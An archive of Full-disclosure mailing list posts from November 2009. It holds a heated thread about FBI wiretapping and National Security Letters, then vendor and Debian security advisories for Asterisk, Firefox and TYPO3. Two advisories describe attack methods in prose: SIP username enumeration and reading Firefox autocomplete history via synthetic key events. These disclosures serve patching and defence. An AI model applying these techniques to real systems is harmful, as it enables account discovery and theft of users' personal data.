Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <351C1CDE56CA1FA6D2AC3502@utd65257.utdallas.edu>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>	<16583.1257310348@turing-police.cc.vt.edu>
	<351C1CDE56CA1FA6D2AC3502@utd65257.utdallas.edu>
Message-ID: <4AF1CD7D.9010203@halvdan.com>

> I said that illegal wiretapping will get thrown out 
> of court and the perpetrators jailed.  That's a separate issue from whether or 
> not agents will all act within the law.

Except that illegal wiretapping DOESN'T get thrown out in court for the
most part that I can see, or it gets retroactively made legal.

If we even get to find out it happened in the first place.


-- 
     Byron L. Sonne :: blsonne at halvdan.com :: www.halvdan.com
gpg: 0x69D9EAA6, C651 EF07 1298 58B3 615D 4019 E196 BAE1 69D9 EAA6


From gem at rellim.com  Wed Nov  4 18:59:09 2009
From: gem at rellim.com (Gary E. Miller)
Date: Wed, 4 Nov 2009 10:59:09 -0800 (PST)
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <0B488C5AAA2312FBB201C0C7@utd65257.utdallas.edu>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
	<20091104043906.GE6450@nosneros.net>
	<0B488C5AAA2312FBB201C0C7@utd65257.utdallas.edu>
Message-ID: <alpine.LNX.1.10.0911041057150.20324@catbert.rellim.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Yo Paul!

On Wed, 4 Nov 2009, Paul Schmehl wrote:

> No.  But I can distinguish between an American citizen and someone living in
> America who may be involved in terrorist activity.  And so can the courts.

I would rather live on your planet, but I am stuck on this one.

If you understand what an NSL is you understnad the courts have no say in it.

RGDS
GARY
- ---------------------------------------------------------------------------
Gary E. Miller Rellim 109 NW Wilmington Ave., Suite E, Bend, OR 97701
	gem at rellim.com  Tel:+1(541)382-8588

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (GNU/Linux)

iD8DBQFK8c8ABmnRqz71OvMRAhoEAKCBQ2F7Dtj7cp4ExqPbIiRiQDskfwCfSMYI
bmX0HL5VmLbH4dIUPh40/KE=
=I/zT
-----END PGP SIGNATURE-----


From Valdis.Kletnieks at vt.edu  Wed Nov  4 19:21:02 2009
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 04 Nov 2009 14:21:02 -0500
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: Your message of "Wed, 04 Nov 2009 12:30:25 CST."
	<351C1CDE56CA1FA6D2AC3502@utd65257.utdallas.edu>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
	<16583.1257310348@turing-police.cc.vt.edu>
	<351C1CDE56CA1FA6D2AC3502@utd65257.utdallas.edu>
Message-ID: <20035.1257362462@turing-police.cc.vt.edu>

On Wed, 04 Nov 2009 12:30:25 CST, Paul Schmehl said:

> No, nor did I state that.  I said that illegal wiretapping will get thrown out 
> of court and the perpetrators jailed.  That's a separate issue from whether or
> not agents will all act within the law.

No, it's the same issue.  If the agents were acting within the law, it wouldn't
be an illegal wiretap.

> > Oh, and how much time did J Edgar spend in jail for his illegal wiretaps?
> > And how much time will anybody spend in jail for the NSL abuses?
> 
> Depends on whether anyone decides to prosecute.

So "illegal wiretap will get the perpetrators jailed" should read "illegal
wiretap *may* get the perpetrators jailed, depending on the whim of the DA
and the political climate at the time".

J. Edgar Hoover went to jail for the maximum sentence for his illegal
surveillance of a Nobel Peace Prize winner, right?

George W Bush and company went to jail for the maximum sentence for their
self-admittedly illegal surveillance without FISA warrants, right?

Oh, they didn't even get indicted, much less jailed?  Yeah. That's what I thought...

"On what planet do you spend most of your time?" -- Barney Frank
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 227 bytes
Desc: not available
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20091104/caf3b559/attachment.bin 

From pschmehl_lists at tx.rr.com  Wed Nov  4 20:00:27 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Wed, 04 Nov 2009 14:00:27 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <alpine.LNX.1.10.0911041057150.20324@catbert.rellim.com>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
	<20091104043906.GE6450@nosneros.net>
	<0B488C5AAA2312FBB201C0C7@utd65257.utdallas.edu>
	<alpine.LNX.1.10.0911041057150.20324@catbert.rellim.com>
Message-ID: <8A913DCF1349E2328F0020C2@utd65257.utdallas.edu>

--On Wednesday, November 04, 2009 12:59:09 -0600 "Gary E. Miller" 
<gem at rellim.com> wrote:

>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Yo Paul!
>
> On Wed, 4 Nov 2009, Paul Schmehl wrote:
>
>> No.  But I can distinguish between an American citizen and someone living in
>> America who may be involved in terrorist activity.  And so can the courts.
>
> I would rather live on your planet, but I am stuck on this one.
>
> If you understand what an NSL is you understnad the courts have no say in it.
>

If you understand what an NSL is then you know that it is applied to an 
infinitesimal portion of the US population.  And you also understand that it 
has to do with *investigation* and not prosecution.  If there is to be a 
prosecution as a result of an NSL then the courts are indeed involved and get 
to decide whether or not the NSL was legal and justified.

That's the world we both live in.  There has been much hot air about NSLs, and, 
as with any governmental behavior, there have been abuses, but the number of 
American citizens who have been wrongly convicted as a result of the 
application of an NSL is zero - unless you can show a documented case of the 
same - and I'm not referring to the bluster and speculation of the news media.

In a country with a population over 300 million, the chances of an ordinary 
citizen being wiretapped without a court order are essentially non-existent.

IOW, as I stated originally, I'm not worried about it.  And as the OP implied, 
all 300 million of us need to be worried about it.  That was the point I was 
taking issue with.

It's essentially the same argument as - I don't want system admins to have 
access to my data because then they can look at it without my knowledge or 
permission (which is true), when sysadmins barely have time to get the work 
done much less snoop around in your stuff.

I seriously doubt the FBI will be wiretapping anyone on this list that isn't 
doing something illegal.

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
*******************************************
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson


From pschmehl_lists at tx.rr.com  Wed Nov  4 20:08:59 2009
From: pschmehl_lists at tx.rr.com (Paul Schmehl)
Date: Wed, 04 Nov 2009 14:08:59 -0600
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <20035.1257362462@turing-police.cc.vt.edu>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>
	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>
	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>
	<16583.1257310348@turing-police.cc.vt.edu>           
	<351C1CDE56CA1FA6D2AC3502@utd65257.utdallas.edu>
	<20035.1257362462@turing-police.cc.vt.edu>
Message-ID: <EDEC5775C3E2ADED0668CA9C@utd65257.utdallas.edu>

--On Wednesday, November 04, 2009 13:21:02 -0600 Valdis.Kletnieks at vt.edu wrote:
>
> George W Bush and company went to jail for the maximum sentence for their
> self-admittedly illegal surveillance without FISA warrants, right?
>

No one in the Bush administration ever "self-admitted" to illegal surveillance 
nor has it ever been proven in court that there *was* any illegal survelliance. 
Stop reading the New York Times.  There are good arguments for the wiretaps 
being illegal, and there are equally good arguments that they were not.  Until 
it's challenged in court and decided one way or the other, calling the wiretaps 
illegal is nothing more than an opinion.

Please cite one proven instance where surveillance was done on anyone without a 
FISA warrant - and lefty blogs filled with hyperbole don't count.

> Oh, they didn't even get indicted, much less jailed?  Yeah. That's what I
> thought...
>
> "On what planet do you spend most of your time?" -- Barney Frank

You should worry a lot more about the loss of your freedoms from people like 
Barney Frank than you ever should about FBI surveillance.

-- 
Paul Schmehl, Senior Infosec Analyst
As if it wasn't already obvious, my opinions
are my own and not those of my employer.
*******************************************
"It is as useless to argue with those who have
renounced the use of reason as to administer
medication to the dead." Thomas Jefferson


From blsonne at halvdan.com  Wed Nov  4 20:10:12 2009
From: blsonne at halvdan.com (Byron Sonne)
Date: Wed, 04 Nov 2009 15:10:12 -0500
Subject: [Full-disclosure] How Prosecutors Wiretap Wall Street
In-Reply-To: <8A913DCF1349E2328F0020C2@utd65257.utdallas.edu>
References: <6450e99d0911031637lfb5b4c0tf3de81f9922bcc59@mail.gmail.com>	<6450e99d0911031755h67b0933do2d2ecfef7781ac73@mail.gmail.com>	<94704CFA565AF9CB5BFA4BF8@Macintosh-2.local>	<20091104043906.GE6450@nosneros.net>	<0B488C5AAA2312FBB201C0C7@utd65257.utdallas.edu>	<alpine.LNX.1.10.0911041057150.20324@catbert.rellim.com>
	<8A913DCF1349E2328F0020C2@utd65257.utdallas.edu>
Message-ID: <4AF1DFA4.1040007@halvdan.com>

> I seriously doubt the FBI will be wiretapping anyone on this list that isn't 
> doing something illegal.

If you're innocent, you have nothing to fear! Step aside, Citizen.

:(


-- 
     Byron L. Sonne :: blsonne at halvdan.com :: www.halvdan.com
gpg: 0x69D9EAA6, C651 EF07 1298 58B3 615D 4019 E196 BAE1 69D9 EAA6


From security at asterisk.org  Wed Nov  4 20:12:22 2009
From: security at asterisk.org (Asterisk Security Team)
Date: Wed, 04 Nov 2009 14:12:22 -0600
Subject: [Full-disclosure] AST-2009-008: SIP responses expose valid usernames
Message-ID: <E1N5mDO-0003PR-SD@mail.digium.com>

               Asterisk Project Security Advisory - AST-2009-008

   +------------------------------------------------------------------------+
   |       Product        | Asterisk                                        |
   |----------------------+-------------------------------------------------|
   |       Summary        | SIP responses expose valid usernames            |
   |----------------------+-------------------------------------------------|
   |  Nature of Advisory  | Information leak                                |
   |----------------------+-------------------------------------------------|
   |    Susceptibility    | Remote Unauthenticated Sessions                 |
   |----------------------+-------------------------------------------------|
   |       Severity       | Minor                                           |
   |----------------------+-------------------------------------------------|
   |    Exploits Known    | No                                              |
   |----------------------+-------------------------------------------------|
   |     Reported On      | October 26, 2009                                |
   |----------------------+-------------------------------------------------|
   |     Reported By      | Patrik Karlsson <patrik AT cqure DOT net>       |
   |----------------------+-------------------------------------------------|
   |      Posted On       | November 4, 2009                                |
   |----------------------+-------------------------------------------------|
   |   Last Updated On    | November 4, 2009                                |
   |----------------------+-------------------------------------------------|
   |   Advisory Contact   | Joshua Colp <jcolp AT digium DOT com>           |
   |----------------------+-------------------------------------------------|
   |       CVE Name       |                                                 |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Description | It is possible to determine if a peer with a specific    |
   |             | name is configured in Asterisk by sending a specially    |
   |             | crafted REGISTER message twice. The username that is to  |
   |             | be checked is put in the user portion of the URI in the  |
   |             | To header. A bogus non-matching value is put into the    |
   |             | username portion of the Digest in the Authorization      |
   |             | header. If the peer does exist the second REGISTER will  |
   |             | receive a response of "403 Authentication user name does |
   |             | not match account name". If the peer does not exist the  |
   |             | response will be "404 Not Found" if alwaysauthreject is  |
   |             | disabled and "401 Unauthorized" if alwaysauthreject is   |
   |             | enabled.                                                 |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Resolution | Upgrade to one of the versions below, or apply one of the |
   |            | patches specified in the Patches section.                 |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                           Affected Versions                            |
   |------------------------------------------------------------------------|
   |          Product           | Release |                                 |
   |                            | Series  |                                 |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    |  1.2.x  | All versions prior to 1.2.35    |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    |  1.4.x  | All versions prior to 1.4.26.3  |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    | 1.6.0.x | All versions prior to 1.6.0.17  |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    | 1.6.1.x | All versions prior to 1.6.1.9   |
   |----------------------------+---------+---------------------------------|
   |      Asterisk Addons       |  1.2.x  | Unaffected                      |
   |----------------------------+---------+---------------------------------|
   |      Asterisk Addons       |  1.4.x  | Unaffected                      |
   |----------------------------+---------+---------------------------------|
   |      Asterisk Addons       |  1.6.x  | Unaffected                      |
   |----------------------------+---------+---------------------------------|
   | Asterisk Business Edition  |  A.x.x  | All versions                    |
   |----------------------------+---------+---------------------------------|
   | Asterisk Business Edition  |  B.x.x  | All versions prior to B.2.5.12  |
   |----------------------------+---------+---------------------------------|
   | Asterisk Business Edition  |  C.x.x  | All versions prior to C.2.4.5   |
   |                            |         | and C.3.2.2                     |
   |----------------------------+---------+---------------------------------|
   |        AsteriskNOW         |   1.5   | All versions                    |
   |----------------------------+---------+---------------------------------|
   | s800i (Asterisk Appliance) |  1.2.x  | All versions prior to 1.3.0.5   |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                              Corrected In                              |
   |------------------------------------------------------------------------|
   |                   Product                   |         Release          |
   |---------------------------------------------+--------------------------|
   |            Asterisk Open Source             |          1.2.35          |
   |---------------------------------------------+--------------------------|
   |            Asterisk Open Source             |         1.4.26.3         |
   |---------------------------------------------+--------------------------|
   |            Asterisk Open Source             |         1.6.0.17         |
   |---------------------------------------------+--------------------------|
   |            Asterisk Open Source             |         1.6.1.9          |
   |---------------------------------------------+--------------------------|
   |          Asterisk Business Edition          |         B.2.5.12         |
   |---------------------------------------------+--------------------------|
   |          Asterisk Business Edition          |         C.2.4.5          |
   |---------------------------------------------+--------------------------|
   |          Asterisk Business Edition          |         C.3.2.2          |
   |---------------------------------------------+--------------------------|
   |         S800i (Asterisk Appliance)          |         1.3.0.5          |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                                Patches                                 |
   |------------------------------------------------------------------------|
   |                            SVN URL                            |Revision|
   |---------------------------------------------------------------+--------|
   |http://downloads.digium.com/pub/asa/AST-2009-008-1.2.diff.txt  |1.2     |
   |---------------------------------------------------------------+--------|
   |http://downloads.digium.com/pub/asa/AST-2009-008-1.4.diff.txt  |1.4     |
   |---------------------------------------------------------------+--------|
   |http://downloads.digium.com/pub/asa/AST-2009-008-1.6.0.diff.txt|1.6.0   |
   |---------------------------------------------------------------+--------|
   |http://downloads.digium.com/pub/asa/AST-2009-008-1.6.1.diff.txt|1.6.1   |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |        Links         |                                                 |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Asterisk Project Security Advisories are posted at                     |
   | http://www.asterisk.org/security                                       |
   |                                                                        |
   | This document may be superseded by later versions; if so, the latest   |
   | version will be posted at                                              |
   | http://downloads.digium.com/pub/security/AST-2009-008.pdf and          |
   | http://downloads.digium.com/pub/security/AST-2009-008.html             |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                            Revision History                            |
   |------------------------------------------------------------------------|
   |         Date          |      Editor       |       Revisions Made       |
   |-----------------------+-------------------+----------------------------|
   | November 4, 2009      | Joshua Colp       | Initial release            |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-008
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.


From security at asterisk.org  Wed Nov  4 20:12:42 2009
From: security at asterisk.org (Asterisk Security Team)
Date: Wed, 04 Nov 2009 14:12:42 -0600
Subject: [Full-disclosure] AST-2009-009: Cross-site AJAX request
	vulnerability
Message-ID: <E1N5mDh-0003QA-TI@mail.digium.com>

               Asterisk Project Security Advisory - AST-2009-009

   +------------------------------------------------------------------------+
   |       Product        | Asterisk                                        |
   |----------------------+-------------------------------------------------|
   |       Summary        | Cross-site AJAX request vulnerability           |
   |----------------------+-------------------------------------------------|
   |  Nature of Advisory  | Cross-site AJAX request exploitation            |
   |----------------------+-------------------------------------------------|
   |    Susceptibility    | Remote Unauthenticated Sessions                 |
   |----------------------+-------------------------------------------------|
   |       Severity       | Minor                                           |
   |----------------------+-------------------------------------------------|
   |    Exploits Known    | No                                              |
   |----------------------+-------------------------------------------------|
   |     Reported On      | October 26, 2009                                |
   |----------------------+-------------------------------------------------|
   |     Reported By      | issues.asterisk.org user jcollie                |
   |----------------------+-------------------------------------------------|
   |      Posted On       | November 4, 2009                                |
   |----------------------+-------------------------------------------------|
   |   Last Updated On    | November 4, 2009                                |
   |----------------------+-------------------------------------------------|
   |   Advisory Contact   | Joshua Colp <jcolp AT digium DOT com>           |
   |----------------------+-------------------------------------------------|
   |       CVE Name       | CVE-2008-7220                                   |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Description | Asterisk includes a demonstration AJAX based manager     |
   |             | interface, ajamdemo.html which uses the prototype.js     |
   |             | framework. An issue was uncovered in this framework      |
   |             | which could allow someone to execute a cross-site AJAX   |
   |             | request exploit.                                         |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Resolution | Upgrade to one of the versions below, or apply one of the |
   |            | patches specified in the Patches section.                 |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                           Affected Versions                            |
   |------------------------------------------------------------------------|
   |          Product           | Release |                                 |
   |                            | Series  |                                 |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    |  1.2.x  | Unaffected                      |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    |  1.4.x  | All versions prior to 1.4.26.3  |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    | 1.6.0.x | All versions prior to 1.6.0.17  |
   |----------------------------+---------+---------------------------------|
   |    Asterisk Open Source    | 1.6.1.x | All versions prior to 1.6.1.9   |
   |----------------------------+---------+---------------------------------|
   |      Asterisk Addons       |  1.2.x  | Unaffected                      |
   |----------------------------+---------+---------------------------------|
   |      Asterisk Addons       |  1.4.x  | Unaffected                      |
   |----------------------------+---------+---------------------------------|
   |      Asterisk Addons       |  1.6.x  | Unaffected                      |
   |----------------------------+---------+---------------------------------|
   | Asterisk Business Edition  |  A.x.x  | Unaffected                      |
   |----------------------------+---------+---------------------------------|
   | Asterisk Business Edition  |  B.x.x  | All versions prior to B.2.5.12  |
   |----------------------------+---------+---------------------------------|
   | Asterisk Business Edition  |  C.x.x  | All versions prior to C.2.4.5   |
   |                            |         | and C.3.2.2                     |
   |----------------------------+---------+---------------------------------|
   |        AsteriskNOW         |   1.5   | All versions                    |
   |----------------------------+---------+---------------------------------|
   | s800i (Asterisk Appliance) |  1.2.x  | Unaffected                      |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                              Corrected In                              |
   |------------------------------------------------------------------------|
   |                  Product                   |          Release          |
   |--------------------------------------------+---------------------------|
   |            Asterisk Open Source            |         1.4.26.3          |
   |--------------------------------------------+---------------------------|
   |            Asterisk Open Source            |         1.6.0.17          |
   |--------------------------------------------+---------------------------|
   |            Asterisk Open Source            |          1.6.1.9          |
   |--------------------------------------------+---------------------------|
   |         Asterisk Business Edition          |         B.2.5.12          |
   |--------------------------------------------+---------------------------|
   |         Asterisk Business Edition          |          C.2.4.5          |
   |--------------------------------------------+---------------------------|
   |         Asterisk Business Edition          |          C.3.2.2          |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                                Patches                                 |
   |------------------------------------------------------------------------|
   |                            SVN URL                            |Revision|
   |---------------------------------------------------------------+--------|
   |http://downloads.digium.com/pub/asa/AST-2009-009-1.4.diff.txt  |1.4     |
   |---------------------------------------------------------------+--------|
   |http://downloads.digium.com/pub/asa/AST-2009-009-1.6.0.diff.txt|1.6.0   |
   |---------------------------------------------------------------+--------|
   |http://downloads.digium.com/pub/asa/AST-2009-009-1.6.1.diff.txt|1.6.1   |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |     Links      | https://issues.asterisk.org/view.php?id=16139         |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   | Asterisk Project Security Advisories are posted at                     |
   | http://www.asterisk.org/security                                       |
   |                                                                        |
   | This document may be superseded by later versions; if so, the latest   |
   | version will be posted at                                              |
   | http://downloads.digium.com/pub/security/AST-2009-009.pdf and          |
   | http://downloads.digium.com/pub/security/AST-2009-009.html             |
   +------------------------------------------------------------------------+

   +------------------------------------------------------------------------+
   |                            Revision History                            |
   |------------------------------------------------------------------------|
   |         Date          |      Editor       |       Revisions Made       |
   |-----------------------+-------------------+----------------------------|
   | October 29, 2009      | Joshua Colp       | Initial release            |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-009
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.


From disclosure at contextis.co.uk  Wed Nov  4 18:35:00 2009
From: disclosure at contextis.co.uk (Context IS - Disclosure)
Date: Wed, 4 Nov 2009 18:35:00 +0000
Subject: [Full-disclosure] Context IS Advisory - Autocomplete Data Theft in
	Mozilla Firefox
Message-ID: <9CE75E98979ABC448892B4284A51E252BF11F41F3C@kestrel.london.contextis.co.uk>

===============================ADVISORY===============================

Name:               Autocomplete Data Theft in Mozilla Firefox
Systems Affected:   Mozilla Firefox 3.5, Mozilla Firefox 3.0
Severity:           Moderate
Category:           Data Leakage
Author:             Context Information Security Ltd
Advisory:           4 November 2009
CVE:			  CVE-2009-3370

===============================ADVISORY===============================

Description:
------------
A malicious web page can extract out all the data stored within the autocomplete history of a user's Firefox browser. The web page must convince a user to hold down the left or right-arrow keys then the contents of the autocomplete popup can be read. This may includes the search history box within the browser, or other personal details.

Analysis
--------
A malicious web page can be created that includes a text field with the same 'name' attribute as data entered on other sites (e.g 'q' for Google). The form autocompletion popup in Firefox can then be triggered and manipulated by a variety of key presses. For example, by pressing the 'a' key, autocomplete entries starting with that letter will be shown. Entries in the poupup can be selected by using the up/ down arrow keys. When the left or right arrow key is pressed, the currently selected entry from the popup is entered into the text field and can be read through JavaScript.

In Firefox, a web page can use the 'createEvent' and 'initKeyEvent' JavaScript methods to create synthetic key events. It was discovered that these events could be used to trigger an autocomplete popup and change the currently selected entry in the popup. 

However, it was not possible for synthetic events to cause the text field to be filled with the current entry. Therefore some user interaction is required to enable the web page to steal the contents of the drop-down. If a web page can convince a user to hold down or repeatedly press the left or right-arrow keys, it can systematically grab each entry in the drop-down box. 

Technologies Affected
---------------------
Mozilla Firefox 3.5.3 and below
Mozilla Firefox 3.0.0.14 and below

Resolution
----------
Mozilla fixed this issue in the 3.5.4 and 3.0.0.15 releases of Firefox:

http://www.mozilla.org/security/announce/2009/mfsa2009-52.html

CVE
---
This issue has been assigned CVE number CVE-2009-3370.

Disclosure Timeline
-------------------
8th August 2009 - Initial Discovery and Vendor Notification 8th August 2009 - Vendor Response
27 October 2009 - Vendor Advisory Release
4 November 2009 - Context Information Security Advisory Release

Credits
-------
Paul Stone of Context Information Security Ltd

About Context Information Security
----------------------------------
Context Information Security Limited is a specialist information security consultancy based in London and Dusseldorf. 
Context promotes the holistic approach to information security and helps clients to identify, assess and control their exposure to risk within the fields of IT, telephony and physical security. Context employs experienced information security professionals who are subject-matter experts in their various technical specialisms.  Context works extensively within the finance, legal, defence and government sectors, delivering high-end information security projects to organisations for which security is a priority.

Web:	www.contextis.co.uk
Email:  disclosure at contextis.co.uk


From thijs at debian.org  Wed Nov  4 19:33:20 2009
From: thijs at debian.org (Thijs Kinkhorst)
Date: Wed,  4 Nov 2009 20:33:20 +0100 (CET)
Subject: [Full-disclosure] [SECURITY] [DSA 1926-1] New TYPO3 packages fix
	several vulnerabilities
Message-ID: <20091104193320.4DD7B3267CE@morgana.loeki.tv>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1926-1                  security at debian.org
http://www.debian.org/security/                          Thijs Kinkhorst
November 4, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : typo3-src
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2009-3628 CVE-2009-3629 CVE-2009-3630 CVE-2009-3631
                 CVE-2009-3632 CVE-2009-3633 CVE-2009-3634 CVE-2009-3635
                 CVE-2009-3636
Debian Bug     : 552020

Several remote vulnerabilities have been discovered in the TYPO3 web
content management framework. The Common Vulnerabilities and Exposures
project identifies the following problems:

CVE-2009-3628

    The Backend subcomponent allows remote authenticated users to
    determine an encryption key via crafted input to a form field.

CVE-2009-3629

    Multiple cross-site scripting (XSS) vulnerabilities in the
    Backend subcomponent allow remote authenticated users to inject
    arbitrary web script or HTML.

CVE-2009-3630

    The Backend subcomponent allows remote authenticated users to
    place arbitrary web sites in TYPO3 backend framesets via
    crafted parameters.

CVE-2009-3631

    The Backend subcomponent, when the DAM extension or ftp upload
    is enabled, allows remote authenticated users to execute
    arbitrary commands via shell metacharacters in a filename.

CVE-2009-3632

    SQL injection vulnerability in the traditional frontend editing
    feature in the Frontend Editing subcomponent allows remote
    authenticated users to execute arbitrary SQL commands.

CVE-2009-3633

    Cross-site scripting (XSS) vulnerability in allows remote
    attackers to inject arbitrary web script.

CVE-2009-3634

    Cross-site scripting (XSS) vulnerability in the Frontend Login Box
    (aka felogin) subcomponent allows remote attackers to inject
    arbitrary web script or HTML.

CVE-2009-3635

    The Install Tool subcomponent allows remote attackers to gain access
    by using only the password's md5 hash as a credential.

CVE-2009-3636

    Cross-site scripting (XSS) vulnerability in the Install Tool
    subcomponen allows remote attackers to inject arbitrary web script
    or HTML.

For the old stable distribution (etch), these problems have been fixed
in version 4.0.2+debian-9.

For the stable distribution (lenny), these problems have been fixed in
version 4.2.5-1+lenny2.

For the unstable distribution (sid), these problems have been fixed in
version 4.2.10-1.

We recommend that you upgrade your typo3-src package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Architecture independent packages:

  http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src-4.0_4.0.2+debian-9_all.deb
    Size/MD5 checksum:  7696110 030c0d0fa407a74b5d48a24d280e2ce5
  http://security.debian.org/pool/updates/main/t/typo3-src/typo3_4.0.2+debian-9_all.deb
    Size/MD5 checksum:    77256 ba868af9c67e56ba346233e3473b94c6

Source archives:

  http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src_4.0.2+debian-9.diff.gz
    Size/MD5 checksum:    32793 a0f7dee86225e89e4914633d2401e232
  http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src_4.0.2+debian.orig.tar.gz
    Size/MD5 checksum:  7683527 be509391b0e4d24278c14100c09dc673
  http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src_4.0.2+debian-9.dsc
    Size/MD5 checksum:      610 522ed0d81b54572f24b984a8448d594b

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src_4.2.5.orig.tar.gz
    Size/MD5 checksum:  8144727 75b2e5db6ac586fb6176f329be452159
  http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src_4.2.5-1+lenny2.diff.gz
    Size/MD5 checksum:   122866 d4bce174f2ea2a94834cc0d250b51495
  http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src_4.2.5-1+lenny2.dsc
    Size/MD5 checksum:     1008 8980c630529cf34c44f491e4ee6e6e07

Architecture independent packages:

  http://security.debian.org/pool/updates/main/t/typo3-src/typo3-src-4.2_4.2.5-1+lenny2_all.deb
    Size/MD5 checksum:  8201724 ea85991b8e26953d7ff43080458cc766
  http://security.debian.org/pool/updates/main/t/typo3-src/typo3_4.2.5-1+lenny2_all.deb
    Size/MD5 checksum:   133854 04e43a0b661c56a307a06f282f304e43


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJK8dbCAAoJECIIoQCMVaAcu6cH/RM9LZkCTXR9kr6i2XjyiD4S
5YyMDoH9634YG6FGy+BawPpC5Bwa+hFNNZylUVu0W1oat5tHSOH1SdaMw++AU1GV
BR4ICxCO7E877JyQNSCBqELrMqCJcpH24Afq5VEbCZJiVOmWAd6M45hnqdMPY63r
p7MCwsw/iaZuwD3BiVutwMxQ9baejxfbRz4iJbd/K2HzV3+mHz5Xz9LSy0BBpC4e
TN5faFnhwl8LdFvnf9gziGp9AVfSI8/RLDVqDRNSBgLB7qZgnQiKSQ+2fO708llA
aJXwGa8WmgIRMVo3oEXKQ/74K9B3RmKppv+szXEiFnhZ6l2J3AzMxUd4sBFZWUI=
=fwRT
-----END PGP SIGNATURE-----


From wh1t3h4t3 at yahoo.co.uk  Wed Nov  4 21:58:11 2009
From: wh1t3h4t3 at yahoo.co.uk (Micheal Turner)
Date: Wed, 4 Nov 2009 21:58:11 +0000 (GMT)
